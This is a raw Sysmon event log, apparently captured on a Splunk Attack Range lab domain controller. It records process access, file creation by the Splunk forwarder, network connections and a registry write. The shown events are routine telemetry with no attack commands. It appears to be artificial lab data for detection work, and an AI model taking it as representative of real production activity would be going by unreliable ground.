12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.452{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:10.545{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6C4388EB26B1C28A114BBC4E334CBD,SHA256=F2EA664C119EAB20228F61BFD2EA4A08B0FDAB669F82EFC98132474A59CE1163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:11.654{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BDDC39D09979B42FD0D633E42E74FBF,SHA256=8EFAF5F3CD2E54F3C776B4FA49C5AF54B063F8A2D364BA4F6EEEA552FD09D924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:12.654{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3C90924CD1DFCB08E9DFB4092E10E2,SHA256=4A46DF47B009DE344A3343E2DBFC5A33CD309D9FF61997415596A6F5CA18AAA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:12.570{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53695-false10.0.1.12-8000- 23542300x800000000000000010462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:13.747{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF04DDB4C74EFECEEC216EE78865E4F,SHA256=6A0ED4CB962F712B759BB9BCECA75FDD1DE017CDA926B616B09E45AB6AF7890B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:14.778{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E463824F9ABD9C5C789318106E4A99D,SHA256=14C144A6CECEAE358C8DA2A4F3F8525B72A85E5C5074E63F2315F3C59019F1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:15.825{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=210F4C9BD892E7C964C08E3CDC11CF42,SHA256=C718B19875B70AB1C7654311C11D3420BE82AADD5054152FE971BFD5E6ECD098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:15.153{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C017D5136C956485970E33C9E559FA1C,SHA256=E1824F4A5093B5942D664824B8B81060EA48E505056C474BDD0FF1A4E9FCD93C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:15.153{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8008E9DFA6D4F295E20648730EC70448,SHA256=451511B5517B85966441BCE12C17E712446BAECF238C01C237A194619DDCF957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:16.840{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9730D82E70F02BD733C99C6206B5FA00,SHA256=BCE1618D8027908D60859197B401A1A3688EFD363AD1145AA9BECC2B07AE1B86,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:14.539{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53696-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:14.539{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53696-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000010471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:17.840{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14702F25B0366186CE7BABDED8CC7DE2,SHA256=46584DFD885CDF53E270F0D3AAC002A0C64C8480E7EA2FC0AD2C1648A8285BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:18.856{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA85E9C5DCE1646F31C172F1FFEFECE,SHA256=3BEEED1309D8F82714568FD12BDC9476E01463034C38075BB2D136B284B9D427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:19.871{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E8C15C8366F7E18932CA21D71F9FC48,SHA256=D8FFE6657383014CD8D3208F7B24A674729E44DBC93952AF3C23634ABD67841B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:20.902{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF8F6CB62FB2B6451A0EBDCDB2954D8,SHA256=D7EEC942D48B784CD37599EEE014B6E8D96088A0469157EAC5C6F802A2C7B92A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:18.523{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53697-false10.0.1.12-8000- 23542300x800000000000000010476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:21.917{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D49442327F2EE47374754251FB4768,SHA256=A2083CF039C5649AC9DA356B00710695E53897FA6A3C748892E28762550C4784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:22.948{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D15D655D0C41F1A9EF33D5A538DC40F,SHA256=F46B2385866F2550F3B92A1F4CFCC7E7347C989DB43C690D2E886028545B10DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:23.995{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55491DCB385B7D4D17CEE3BFE324D4EC,SHA256=2848E7314FFC757BDD68AF0542ACC74B8FA5B8BD4D88696AE5E607C55FD75333,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:23.664{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53698-false10.0.1.12-8000- 23542300x800000000000000010479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:25.010{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCF3FC548B1439110A2136CB7555FC8,SHA256=A01305584F04E8B50A419E528BFADB07A15E7570F62163EFBE429E3A0F23BA16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:26.120{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2014F14025395796CEC32625739DDBFD,SHA256=155EA99B3CF20FF9FE59068DDFFD118FAF7C021E75AF5FDEDAACD99D1CCE9895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:27.151{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DA81104AA1E7554A5628CFD3E48AAE3,SHA256=ADF1A099C55FDFE41762A87A8D53EB7735BEEA9191023C5F6B79C78487457E7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:28.182{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDBDB1F000612465A2A70FE70E5DC86,SHA256=E6EEFB22FA5F3483326E6C74E446FD2AAF6F91641AEFF1AAF4B67567A8D789D9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:08:29.322{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x8fc29958) 23542300x800000000000000010484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:29.197{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504778D373243737E968E04339579802,SHA256=ADC478FCDDFB81F7FC2B0577AEA20F35581986C93883DD167235082704CCD77C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:29.617{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53699-false10.0.1.12-8000- 23542300x800000000000000010486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:30.228{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D98D99F29499A6A4EBE53413F2BBEAC9,SHA256=61143D0383068C532B5418C51F3C0B4E7493FD60A175AB54ED62B98966D3946C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:31.275{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=272FBCD78C3EC0F9E80252FF70CEFB40,SHA256=1E75BECA21AAE8B55D54136670AC452D19B2695986F2735970CCEE595FDDB167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:31.056{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2A745496B3F999331D42539B4B4FD299,SHA256=E6CFD47F12534EF9BA9877BBE9593AB2608ADD2EEC5754293CF68AEBBE2FF45C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:32.400{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=10FD06EF5611D738DDAAD57850CBE8FE,SHA256=13597C276BD4FB8548DA2DD0879CE0347A21DFE48AD948626D2064681CF30B02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:32.306{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E297D6B025B8F48DE247462CBBA6DC4D,SHA256=167C506A851A73584347838CE65565BF4E72315E92605FA8FE56CD2C44F1CB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:33.368{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B8C2C5C8237A6C1596E7530277C967F,SHA256=737C29FEFE4FAF5890111D526AB9BDF7808D17DD450018F56D92962AFD507BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:34.681{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9A6685813F508DF518A1E5D5DC20473,SHA256=1A55F4F8E1938A99958AA855FA5272E5AF2CE0E3E2CB5AA4CF8483352FC68DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:34.431{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CD163CB7EAAD0F6CAD9FA18957429BB,SHA256=D4E0932B2A96C6A9155EBB7FA90A18C4AF88038EBBE6451421FD4625B41777B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:35.509{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=322066B75C11C6C132C9A39D95385515,SHA256=8392C930DF5792F8E87565132F60B743731BF940966EBC484CBEE5B1E114ABC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:35.538{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53700-false10.0.1.12-8000- 10341000x800000000000000010504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.571{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-6644-6064-6701-00000000AE01}4524C:\Windows\SysWOW64\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.540{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215643824F0409DC5CBFE4265D3A275D,SHA256=865C3EA3367541671A3F9B01461AEB131A4F6FD57D16445C6169F6C250CEB56F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:36.524{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 